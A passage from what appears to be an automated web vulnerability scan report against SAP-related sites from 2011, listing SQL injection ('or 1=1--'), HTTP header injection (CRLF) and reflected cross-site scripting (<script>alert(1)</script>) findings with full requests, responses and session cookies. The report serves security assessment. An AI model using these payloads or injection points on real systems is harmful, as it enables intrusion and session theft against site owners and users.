                                                               <td colspan="1" class="field-label" width="10">&nbsp;</td>
                                                           
                                                                       <td colspan="4" class="field-label" align="Left" valign="Top" width="700" style="padding-top:3px;padding-bottom:3px;">
                                                               <script type="text/javascript">
function displayQuestion(id1) {
   var browserName=navigator.appName;
   if (browserName=="Netscape") {
       document.getElementById(id1).style.display = 'table-row-group';
   } else {
       document.getElementById(id1).style.display = 'inline';
   }
}
function hideQuestion(id1) {
   document.getElementById(id1).style.display = 'none';
}

function displayHide(id1,id2) {
   if (document.RegForm.sTandC.checked)
       displayQuestion(id1)
   else
       hideQuestion(id1)
}
</script>

<p><strong>SAP TechEd Registrant Terms and Conditions</strong></p><p>This registration and your attendance at SAP TechEd is subject to the &quot;<a href="javascript:newwindow(&#39;index.cfm?fuseaction=reg.TermsAndConditions&amp;bHeader
...[SNIP]...

1.2. http://weblogs.sdn.sap.com/pub/t/27 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://weblogs.sdn.sap.com
Path:   /pub/t/27

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16635132'%20or%201%3d1--%20 and 16635132'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pub/t/2716635132'%20or%201%3d1--%20 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:44:02 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 83451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base target="_top">
<!-- SDN Weblogs generated page -->
<!-- cs_lay/24 -->
   <title>SAP Network Blog: SAP NetWeaver Platform</title>
   <link href="weblogs" rel="schema.DC" />
   <link rel="image_src" href="/images/sap_fb_icon_73_73.gif" />
   <meta name="description" content="" />
   <meta name="DC.description" content="" />
   <meta name="author" content="" />
   <meta name="DC.author" content="" />
   <meta name="date" content="May. 23, 2003" />
   <meta name="DC.date" content="May. 23, 2003" />
   <meta name="keywords" content="SDN Blogs,,sap blog,business blog,software blogs,application blog" />
   <meta name="DC.keywords" content="SDN Blogs,,sap blog,business blog,software blogs,application blog" />

<link rel="STYLESHEET" type="text/css" href="http://weblogs.sdn.sap.com/css/csin.css" />
<script type="text/javascript" language="javascript">
if ( document.domain.indexOf(".") > 0 ) document.domain = document.domain.substr(document.domain.indexOf(".")+1);
</script>



<script type="text/javascript" language="javascript">
try {
   // Match http or https
   var pattern = /^https?:\/\/(www(\d{3})?|wwwn|admin|webservice)\.sdn\.sap\.com/;

   if (!pattern.test(parent.location.href)) {
       // preserve current protocol, whether http or https



parent.location.replace(document.location.protocol+'//www.sdn.sap.com/irj/scn/weblogs?blog='
           + escape(document.location.pathname) + escape(document.location.search));
   }    
} catch (e) { }
</script>
<noscript><!-- script for frames and spidering --></noscript>




</head>

<body style="padding-right: 0px; padding-left: 0px; padding-bottom: 0px; margin: 0px; padding-top: 0px">

<table cellspacing="0" cellpadding="0" border="0" style="padding-top:15px;">
<tr>
<td width="12">&nbsp;&nbsp;&nbsp;</td>
<td width="100%
...[SNIP]...

Request 2

GET /pub/t/2716635132'%20or%201%3d2--%20 HTTP/1.1
Host: weblogs.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 500 Internal Server Error
Date: Sat, 15 Oct 2011 14:44:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 38
Connection: close
Content-Type: text/html

The server has encountered a problem.

2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reservoir.marketstudio.net
Path:   /reservoir

Issue detail

The value of the d request parameter is copied into the Location response header. The payload 57e50%0d%0a7cb60e2cdc6 was submitted in the d parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /reservoir?d=57e50%0d%0a7cb60e2cdc6&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession HTTP/1.1
Host: reservoir.marketstudio.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:30:46 GMT
Server: Apache
X-Server-Name: resweb@dc1web51
Set-Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Sun, 20-Oct-2030 01:09:46 GMT
Location: http://reservoir.marketstudio.net/57e50
7cb60e2cdc6
?d=57e50%0d%0a7cb60e2cdc6&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession
Content-Length: 350
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://reservoir.marketstudio.net/57e50
7cb60e
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 139 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a68f<script>alert(1)</script>2f938d81d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img6a68f<script>alert(1)</script>2f938d81d11/assets/mobility/unwired.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:40 GMT
Date: Sat, 15 Oct 2011 14:25:40 GMT
Connection: close

File not found: /img6a68f<script>alert(1)</script>2f938d81d11/assets/mobility/unwired.jpg

3.2. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f743b<script>alert(1)</script>1d42a6eebdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/assetsf743b<script>alert(1)</script>1d42a6eebdc/mobility/unwired.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:41 GMT
Date: Sat, 15 Oct 2011 14:25:41 GMT
Connection: close

File not found: /img/assetsf743b<script>alert(1)</script>1d42a6eebdc/mobility/unwired.jpg

3.3. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7944<script>alert(1)</script>23ec30e32fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/assets/mobilityd7944<script>alert(1)</script>23ec30e32fa/unwired.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Cache-Control: public, max-age=86368
Expires: Sun, 16 Oct 2011 14:25:12 GMT
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/assets/mobilityd7944<script>alert(1)</script>23ec30e32fa/unwired.jpg

3.4. http://ecohub.sap.com/img/assets/mobility/unwired.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/assets/mobility/unwired.jpg

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2415<script>alert(1)</script>4d9ac83b755 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/assets/mobility/unwired.jpga2415<script>alert(1)</script>4d9ac83b755?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 90
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/assets/mobility/unwired.jpga2415<script>alert(1)</script>4d9ac83b755

3.5. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/Madrid.288.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 117e1<script>alert(1)</script>973b6f008cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img117e1<script>alert(1)</script>973b6f008cd/banners/Madrid.288.png?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 85
Cache-Control: public, max-age=86350
Expires: Sun, 16 Oct 2011 14:24:55 GMT
Date: Sat, 15 Oct 2011 14:25:45 GMT
Connection: close

File not found: /img117e1<script>alert(1)</script>973b6f008cd/banners/Madrid.288.png

3.6. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/Madrid.288.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c1bb<script>alert(1)</script>a2aabb6bf4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners7c1bb<script>alert(1)</script>a2aabb6bf4e/Madrid.288.png?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
